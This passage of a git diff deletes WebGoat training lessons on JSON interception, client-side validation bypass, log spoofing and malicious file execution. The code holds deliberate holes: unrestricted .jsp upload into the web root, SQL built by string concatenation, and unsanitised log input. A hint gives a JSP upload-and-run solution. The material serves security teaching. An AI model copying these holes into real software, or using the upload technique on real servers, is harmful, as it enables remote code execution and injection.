Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Sherif Koussa Software Secured - * @created December 25, 2006 - */ - -public class JSONInjection extends LessonAdapter -{ - - private final static Integer DEFAULT_RANKING = new Integer(30); - - private final static String TRAVEL_FROM = "travelFrom"; - - private final static String TRAVEL_TO = "travelTo"; - - private final static IMG MAC_LOGO = new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured") - .setBorder(0).setHspace(0).setVspace(0); - - public void handleRequest(WebSession s) - { - - try - { - if (s.getParser().getRawParameter("from", "").equals("ajax")) - { - String lineSep = System.getProperty("line.separator"); - String jsonStr = "{" + lineSep + "\"From\": \"Boston\"," + lineSep + "\"To\": \"Seattle\", " + lineSep - + "\"flights\": [" + lineSep - + "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," + lineSep - + "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} " + lineSep + "]" - + lineSep + "}"; - s.getResponse().setContentType("text/html"); - s.getResponse().setHeader("Cache-Control", "no-cache"); - PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); - out.print(jsonStr); - out.flush(); - out.close(); - return; - } - } catch (Exception ex) - { - ex.printStackTrace(); - } - - Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType(""); - form.setOnSubmit("return check();"); - - form.addElement(createContent(s)); - - setContent(form); - - } - - /** - * Description of the Method - * - * @param s - * Current WebSession - */ - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; - ec.addElement(new StringElement(script)); - Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); - - TR tr = new TR(); - - 
tr.addElement(new TD("From: ")); - Input in = new Input(Input.TEXT, TRAVEL_FROM, ""); - in.addAttribute("onkeyup", "getFlights();"); - in.addAttribute("id", TRAVEL_FROM); - tr.addElement(new TD(in)); - - t1.addElement(tr); - - tr = new TR(); - tr.addElement(new TD("To: ")); - in = new Input(Input.TEXT, TRAVEL_TO, ""); - in.addAttribute("onkeyup", "getFlights();"); - in.addAttribute("id", TRAVEL_TO); - tr.addElement(new TD(in)); - - t1.addElement(tr); - ec.addElement(t1); - - ec.addElement(new BR()); - ec.addElement(new BR()); - Div div = new Div(); - div.addAttribute("name", "flightsDiv"); - div.addAttribute("id", "flightsDiv"); - ec.addElement(div); - - Input b = new Input(); - b.setType(Input.SUBMIT); - b.setValue("Submit"); - b.setName("SUBMIT"); - ec.addElement(b); - - Input price2Submit = new Input(); - price2Submit.setType(Input.HIDDEN); - price2Submit.setName("price2Submit"); - price2Submit.setValue(""); - price2Submit.addAttribute("id", "price2Submit"); - ec.addElement(price2Submit); - if (s.getParser().getRawParameter("radio0", "").equals("on")) - { - String price = s.getParser().getRawParameter("price2Submit", ""); - price = price.replace("$", ""); - if (Integer.parseInt(price) < 600) - { - makeSuccess(s); - } - else - { - s.setMessage("You are close, try to set the price for the non-stop flight to be less than $600"); - } - } - return ec; - } - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO); - } - - protected Category getDefaultCategory() - { - return Category.AJAX_SECURITY; - } - - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("JSON stands for JavaScript Object Notation."); - hints.add("JSON is a way of representing data just like XML."); - hints.add("The JSON payload is easily interceptable."); - hints.add("Intercept the reply, change the $600 to $25."); - return hints; - - } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - 
/** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("JSON Injection"); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java b/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java deleted file mode 100644 index 726971e98..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/JavaScriptValidation.java +++ /dev/null 
@@ -1,270 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import java.util.regex.Pattern; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.Div; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.TextArea; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 - */ - -public class JavaScriptValidation extends LessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - - ElementContainer ec = new ElementContainer(); - - // Regular expressions in Java and JavaScript compatible form - - // Note: if you want to use the regex=new RegExp(\"" + regex + "\");" syntax - - // you'll have to use \\\\d to indicate a digit for example -- one escaping for Java and one - // for JavaScript - - String regex1 = "^[a-z]{3}$";// any three lowercase letters - String regex2 = "^[0-9]{3}$";// any three digits - String regex3 = "^[a-zA-Z0-9 ]*$";// alphanumerics and space without punctuation - String regex4 = "^(one|two|three|four|five|six|seven|eight|nine)$";// enumeration of - // numbers - String regex5 = "^\\d{5}$";// simple zip code - String regex6 = "^\\d{5}(-\\d{4})?$";// zip with optional dash-four - String regex7 = "^[2-9]\\d{2}-?\\d{3}-?\\d{4}$";// US phone number with or without dashes - Pattern pattern1 = Pattern.compile(regex1); - Pattern pattern2 = Pattern.compile(regex2); - Pattern pattern3 = Pattern.compile(regex3); - Pattern pattern4 = Pattern.compile(regex4); - Pattern pattern5 = Pattern.compile(regex5); - Pattern pattern6 = Pattern.compile(regex6); - Pattern pattern7 = Pattern.compile(regex7); - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; - try - { - String param1 = s.getParser().getRawParameter("field1", "abc"); - String param2 = s.getParser().getRawParameter("field2", "123"); - String param3 = 
s.getParser().getRawParameter("field3", "abc 123 ABC"); - String param4 = s.getParser().getRawParameter("field4", "seven"); - String param5 = s.getParser().getRawParameter("field5", "90210"); - String param6 = s.getParser().getRawParameter("field6", "90210-1111"); - String param7 = s.getParser().getRawParameter("field7", "301-604-4882"); - ec.addElement(new StringElement(script)); - TextArea input1 = new TextArea("field1", 1, 25).addElement(param1); - TextArea input2 = new TextArea("field2", 1, 25).addElement(param2); - TextArea input3 = new TextArea("field3", 1, 25).addElement(param3); - TextArea input4 = new TextArea("field4", 1, 25).addElement(param4); - TextArea input5 = new TextArea("field5", 1, 25).addElement(param5); - TextArea input6 = new TextArea("field6", 1, 25).addElement(param6); - TextArea input7 = new TextArea("field7", 1, 25).addElement(param7); - - Input b = new Input(); - b.setType(Input.BUTTON); - b.setValue("Submit"); - b.addAttribute("onclick", "validate();"); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("3LowerCase")+"(" - + regex1 + ")"))); - ec.addElement(new Div().addElement(input1)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("Exactly3Digits")+"(" + regex2 + ")"))); - ec.addElement(new Div().addElement(input2)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("LettersNumbersSpaceOnly")+"(" + regex3 - + ")"))); - ec.addElement(new Div().addElement(input3)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("EnumerationOfNumbers")+" (" + regex4 + ")"))); - ec.addElement(new Div().addElement(input4)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("SimpleZipCode")+ " (" + regex5 + ")"))); - ec.addElement(new Div().addElement(input5)); - ec.addElement(new P()); - ec.addElement(new Div() - 
.addElement(new StringElement(getLabelManager().get("ZIPDashFour")+" (" + regex6 + ")"))); - ec.addElement(new Div().addElement(input6)); - ec.addElement(new P()); - ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("USPhoneNumber")+ " (" - + regex7 + ")"))); - ec.addElement(new Div().addElement(input7)); - ec.addElement(new P()); - ec.addElement(b); - - // Check the patterns on the server -- and note the errors in the response - // these should never match unless the client side pattern script doesn't work - - int err = 0; - String msg = ""; - - if (!pattern1.matcher(param1).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+" Field1."; - } - - if (!pattern2.matcher(param2).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+" Field2."; - } - - if (!pattern3.matcher(param3).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+"Field3."; - } - - if (!pattern4.matcher(param4).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+"Field4."; - } - - if (!pattern5.matcher(param5).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+"Field5."; - } - - if (!pattern6.matcher(param6).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+"Field6."; - } - - if (!pattern7.matcher(param7).matches()) - { - err++; - msg += "
"+getLabelManager().get("ServerSideValidationViolation")+"Field7."; - } - - if (err > 0) - { - s.setMessage(msg); - } - if (err >= 7) - { - // This means they defeated all the client side checks - makeSuccess(s); - } - } - - catch (Exception e) - { - s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.PARAMETER_TAMPERING; - } - - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add(getLabelManager().get("JavaScriptValidationHint1")); - hints.add(getLabelManager().get("JavaScriptValidationHint2")); - hints.add(getLabelManager().get("JavaScriptValidationHint3")); - - - return hints; - } - - - private final static Integer DEFAULT_RANKING = new Integer(120); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Bypass Client Side JavaScript Validation"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java b/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java deleted file mode 100644 index c143c07b6..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java +++ /dev/null 
@@ -1,159 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.io.UnsupportedEncodingException; -import java.net.URLDecoder; -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.HtmlColor; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.PRE; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Sherif Koussa Software Secured - * @created October 28, 2006 - */ - -public class LogSpoofing extends LessonAdapter -{ - - private static final String USERNAME = "username"; - - private static final String PASSWORD = "password"; - - - public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0)); - - protected Element createContent(WebSession s) - { - - ElementContainer ec = null; - String inputUsername = null; - try - { - - Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); - TR row1 = new TR(); - TR row2 = new TR(); - TR row3 = new TR(); - - row1.addElement(new TD(new StringElement(getLabelManager().get("UserName")+":"))); - Input username = new Input(Input.TEXT, USERNAME, ""); - row1.addElement(new TD(username)); - - row2.addElement(new TD(new StringElement(getLabelManager().get("Password")+": "))); - Input password = new Input(Input.PASSWORD, PASSWORD, ""); - row2.addElement(new TD(password)); - - Element b = ECSFactory.makeButton(getLabelManager().get("Login")); - row3.addElement(new TD(new StringElement("  "))); - row3.addElement(new TD(b)).setAlign("right"); - - t.addElement(row1); - t.addElement(row2); - t.addElement(row3); - - ec = new ElementContainer(); - ec.addElement(t); - - inputUsername = new String(s.getParser().getRawParameter(USERNAME, "")); - - if (inputUsername.length() != 0) - { - inputUsername = URLDecoder.decode(inputUsername, "UTF-8"); - } - - ec.addElement(new PRE(" ")); - - Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0); - TR row4 = new TR(); - row4.addElement(new TD(new PRE(getLabelManager().get("LoginFailedForUserName")+": " + inputUsername))).setBgColor(HtmlColor.GRAY); - - t2.addElement(row4); - - ec.addElement(t2); - - if (inputUsername.length() > 0 && 
inputUsername.indexOf('\n') >= 0 && inputUsername.indexOf('\n') >= 0) - { - makeSuccess(s); - } - } catch (UnsupportedEncodingException e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return ec; - } - - private final static Integer DEFAULT_RANKING = new Integer(72); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - @Override - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add(getLabelManager().get("LogSpoofingHint1")); - hints.add(getLabelManager().get("LogSpoofingHint2")); - hints.add(getLabelManager().get("LogSpoofingHint3")); - hints.add(getLabelManager().get("LogSpoofingHint4")); - return hints; - } - - @Override - public String getTitle() - { - return "Log Spoofing"; - } - - @Override - protected Category getDefaultCategory() - { - return Category.INJECTION; - } - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java b/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java deleted file mode 100644 index fdc3235fe..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java +++ /dev/null 
@@ -1,501 +0,0 @@ -package org.owasp.webgoat.lessons; - -import java.sql.Connection; -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import java.util.ArrayList; -import java.util.List; -import java.io.File; - -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.html.Form; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.A; -import org.apache.ecs.html.IMG; -import org.owasp.webgoat.session.DatabaseUtilities; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - -import org.apache.commons.fileupload.*; -import org.apache.commons.fileupload.disk.*; -import org.apache.commons.fileupload.servlet.*; - -/******************************************************************************* - * - * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. - * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository - * for free software projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Chuck Willis of MANDIANT - * @created July 11, 2008 - */ -public class MaliciousFileExecution extends LessonAdapter -{ - - private final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0)); - - // the UPLOADS_DIRECTORY is where uploads are stored such that they can be references - // in image tags as "uploads/filename.ext". This directory string should not contain any path separators (/ or \) - private String uploads_and_target_parent_directory = null; - - private final static String UPLOADS_RELATIVE_PATH = "uploads"; - - // this is the target directory that the user must put a file in to pass the lessson. The file must be named - // username.txt. This directory string should not contain any path separators (/ or \) - - private final static String TARGET_RELATIVE_PATH = "mfe_target"; - - // this should probably go in a constructor, but we need the session object... 
- // may be able to do something like: - // String directory = this.getServletContext().getRealPath("/"); - private void fill_uploads_and_target_parent_directory(WebSession s) { - //uploads_and_target_parent_directory = s.getWebgoatContext().getServlet().getServletContext().getRealPath("/"); - uploads_and_target_parent_directory = s.getContext().getRealPath("/"); - // make sure it ends with a / or \ - if(!uploads_and_target_parent_directory.endsWith(File.separator)) { - uploads_and_target_parent_directory = uploads_and_target_parent_directory + - File.separator; - } - System.out.println("uploads_and_target_parent_directory set to = " - + uploads_and_target_parent_directory); - - // make sure the directories exist - File uploads_dir = new File(uploads_and_target_parent_directory - + UPLOADS_RELATIVE_PATH); - uploads_dir.mkdir(); - - File target_dir = new File(uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH); - target_dir.mkdir(); - - // delete the user's target file if it is already there since we must - // have restarted webgoat - File userfile = new File(uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH + java.io.File.separator - + s.getUserName() + ".txt"); - - userfile.delete(); - - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - - if(uploads_and_target_parent_directory == null) { - fill_uploads_and_target_parent_directory(s); - } - - - ElementContainer ec = new ElementContainer(); - - try - { - - // check for success - see if the target file exists yet - - File userfile = new File(uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH + java.io.File.separator - + s.getUserName() + ".txt"); - - if(userfile.exists()) { - makeSuccess(s); - } - - Connection connection = DatabaseUtilities.getConnection(s); - - ec.addElement(new H1().addElement("WebGoat Image Storage")); - - // show the current 
image - ec.addElement(new P().addElement("Your current image:")); - - String image_query = "SELECT image_relative_url FROM mfe_images WHERE user_name = '" - + s.getUserName() + "'"; - - Statement image_statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet image_results = image_statement.executeQuery(image_query); - - if(image_results.next() == false) { - // result set was empty - ec.addElement(new P().addElement("No image uploaded")); - System.out.println("No image uploaded"); - } else { - - String image_url = image_results.getString(1); - - ec.addElement(new IMG(image_url).setBorder(0).setHspace(0).setVspace(0)); - - System.out.println("Found image named: " + image_url); - - } - - ec.addElement(new P().addElement("Upload a new image:")); - - Input input = new Input(Input.FILE, "myfile", ""); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Start Upload"); - ec.addElement(b); - - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * Gets the category attribute of the SqlInjection object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.MALICIOUS_EXECUTION; - } - - /** - * Gets the credits attribute of the AbstractLesson object - * - * @return The credits value - */ - public Element getCredits() - { - return super.getCustomCredits("Created by Chuck Willis ", MANDIANT_LOGO); - } - - /** - * Gets the hints attribute of the DatabaseFieldScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - if(uploads_and_target_parent_directory == null) { - fill_uploads_and_target_parent_directory(s); - } - - String target_filename = uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH - + java.io.File.separator - + s.getUserName() + ".txt"; - - List hints = new ArrayList(); - - hints.add("Where are uploaded 
images stored? Can you browse to them directly?"); - - hints.add("What type of file can you upload to a J2EE server that will be executed when you browse to it?"); - - hints.add("You want to upload a .jsp file that creates an instance of the class java.io.File " + - " and calls the createNewFile() method of that instance."); - - hints.add("Below are some helpful links..." + - "

Here is a page with an example of a simple .jsp file using a Scriptlet:" + - "
" + - "http://www.jsptut.com/Scriptlets.jsp" + - "

Here is an page with an example of using createNewFile():" + - "
" + - "http://www.roseindia.net/java/example/java/io/CreateFile.shtml" + - "

Here is the API specification for java.io.File:" + - "
" + - "http://java.sun.com/j2se/1.5.0/docs/api/java/io/File.html" - ); - - hints - .add("Here is an example .jsp file, modify it to use java.io.File and its createNewFile() method:" - + "

<HTML>" - + "
<%" - + "
java.lang.String hello = new java.lang.String(\"Hello World!\");" - + "
System.out.println(hello);" - + "
%>" - + "
</HTML>" - + "

NOTE: executing this file will print \"Hello World!\" to the Tomcat Console, not to your client browser" - ); - - - hints - .add("SOLUTION:

Upload a file with a .jsp extension and this content:" - + "

<HTML>" - + "
<%" - + "
java.io.File file = new java.io.File(\"" - + target_filename.replaceAll("\\\\", "\\\\\\\\") // if we are on windows, we need to - // make sure path separators are doubled / escaped - + "\");" - + "
file.createNewFile();" - + "
%>" - + "
</HTML>" - + "

After you have uploaded your jsp file, you can get the system to execute it by opening it in your browser at the URL below (or by just refreshing this page):" - + "

http://webgoat_ip:port/WebGoat/" + UPLOADS_RELATIVE_PATH + "/yourfilename.jsp" - ); - - return hints; - } - - // this is a custom method for this lesson to restart. It is called in WebSession.restartLesson - // in a currently somewhat "hacked up" manner that is specific to this lesson. There probably - // should be an abstract type for lessons that need custom "restarting" code. - public void restartLesson(WebSession s) - { - - if(uploads_and_target_parent_directory == null) { - fill_uploads_and_target_parent_directory(s); - } - - System.out.println("Restarting Malicious File Execution lesson for user " + s.getUserName()); - - // delete the user's target file - File userfile = new File(uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH - + java.io.File.separator - + s.getUserName() + ".txt"); - - userfile.delete(); - - // remove the row from the mfe table - // add url to database table - - try { - Connection connection = DatabaseUtilities.getConnection(s); - - Statement statement = connection.createStatement(); - - String deleteuserrow = "DELETE from mfe_images WHERE user_name = '" - + s.getUserName() + "';"; - - statement.executeUpdate(deleteuserrow); - - } catch (SQLException e) { - // TODO Auto-generated catch block - e.printStackTrace(); - } - - } - - // cleanup code has been disabled for now. 
I'm not sure where it can be called cleanly - // where it will know what directory to use since that is pulled from the session object - - // this method will delete files in the target directory and the uploads directory - // it should be called when WebGoat starts -// public static void cleanDirectories() { -// // delete files in TARGET_DIRECTORY -// File target_dir = new File(TARGET_RELATIVE_PATH); -// deleteFilesInDir(target_dir); -// -// // delete files in uploads directory -// File uploads_dir = new File(uploads_and_target_parent_directory + UPLOADS_RELATIVE_PATH); -// deleteFilesInDir(uploads_dir); -// -// } - -// private static void deleteFilesInDir(File dir) { -// File[] dir_files = dir.listFiles(); -// for(int i = 0; i < dir_files.length; i++) { -// // we won't recurse and we don't want to delete every file just in -// // case TARGET_DIRECTORY or uploads directory is pointed -// // somewhere stupid, like c:\ or / -// if(dir_files[i].isFile()) { -// String lower_file_name = dir_files[i].getName().toLowerCase(); -// -// if(lower_file_name.endsWith(".jpg") || -// lower_file_name.endsWith(".gif") || -// lower_file_name.endsWith(".png") || -// lower_file_name.endsWith(".jsp") || -// lower_file_name.endsWith(".txt") || -// lower_file_name.endsWith(".asp") || // in case they think this is a IIS server :-) -// lower_file_name.endsWith(".aspx")) { -// dir_files[i].delete(); -// } -// } -// } -// } - - - /** - * Gets the instructions attribute of the object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - if(uploads_and_target_parent_directory == null) { - fill_uploads_and_target_parent_directory(s); - } - - String instructions = "The form below allows you to upload an image which will be displayed on this page. " - + "Features like this are often found on web based discussion boards and social networking sites. " - + "This feature is vulnerable to Malicious File Execution." - + "

In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute," - + " it should create another file named:

" - + uploads_and_target_parent_directory - + TARGET_RELATIVE_PATH - + java.io.File.separator - + s.getUserName() + ".txt" - + "

Once you have created this file, you will pass the lesson."; - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(75); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the DatabaseFieldScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Malicious File Execution"); - } - - /** - * Constructor for the DatabaseFieldScreen object - * - * @param s - * Description of the Parameter - */ - public void handleRequest(WebSession s) - { - - if(uploads_and_target_parent_directory == null) { - fill_uploads_and_target_parent_directory(s); - } - - - - try - { - if(ServletFileUpload.isMultipartContent(s.getRequest())) { - // multipart request - we have the file upload - -// Create a factory for disk-based file items - DiskFileItemFactory factory = new DiskFileItemFactory(); - factory.setSizeThreshold(500000); // files over 500k will be written to disk temporarily. - // files under that size will be stored in memory until written to disk by the request handler code below - -// Create a new file upload handler - ServletFileUpload upload = new ServletFileUpload(factory); - -// Parse the request - List /* FileItem */ items = upload.parseRequest(s.getRequest()); - -// Process the uploaded items - java.util.Iterator iter = items.iterator(); - while (iter.hasNext()) { - FileItem item = (FileItem) iter.next(); - - if (item.isFormField()) { - - // ignore regular form fields - - } else { - - // not a form field, must be a file upload - if(item.getName().contains("/") || item.getName().contains("\\")) { - System.out.println("Uploaded file contains a / or \\ (i.e. attempted directory traversal). Not storing file."); - // TODO - is there a way to show an error to the user here? - - s.setMessage("Directory traversal not allowed. 
Nice try though."); - - } else { - - // write file to disk with original name in uploads directory - String uploaded_file_path = uploads_and_target_parent_directory - + UPLOADS_RELATIVE_PATH - + java.io.File.separator - + item.getName(); - File uploadedFile = new File(uploaded_file_path); - item.write(uploadedFile); - System.out.println("Stored file:\n" + uploaded_file_path ); - - // add url to database table - Connection connection = DatabaseUtilities.getConnection(s); - - Statement statement = connection.createStatement(); - - // attempt an update - String updateData1 = "UPDATE mfe_images SET image_relative_url='" + UPLOADS_RELATIVE_PATH + "/" - + item.getName() + "' WHERE user_name = '" - + s.getUserName() + "';"; - - System.out.println("Updating row:\n" + updateData1 ); - if(statement.executeUpdate(updateData1) == 0) { - - // update failed, we need to add a row - String insertData1 = "INSERT INTO mfe_images VALUES ('" + - s.getUserName() + "','" + UPLOADS_RELATIVE_PATH + "/" + - item.getName() + "')"; - - System.out.println("Inserting row:\n" + insertData1 ); - statement.executeUpdate(insertData1); - - } - } - - } - } - - } - // now handle normally (if it was a multipart request or now) - - //super.handleRequest(s); - - // needed to cut and paste and edit rather than calling super - // here so that we could set the encoding type to multipart form data - // call createContent first so messages will go somewhere - - Form form = new Form(getFormAction(), Form.POST).setName("form") - .setEncType("multipart/form-data"); - - form.addElement(createContent(s)); - - setContent(form); - } - catch (Exception e) - { - System.out.println("Exception caught: " + e); - e.printStackTrace(System.out); - } - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin1.java b/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin1.java deleted file mode 100644 index f2ad38111..000000000 
--- a/src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin1.java
+++ /dev/null
@@ -1,851 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
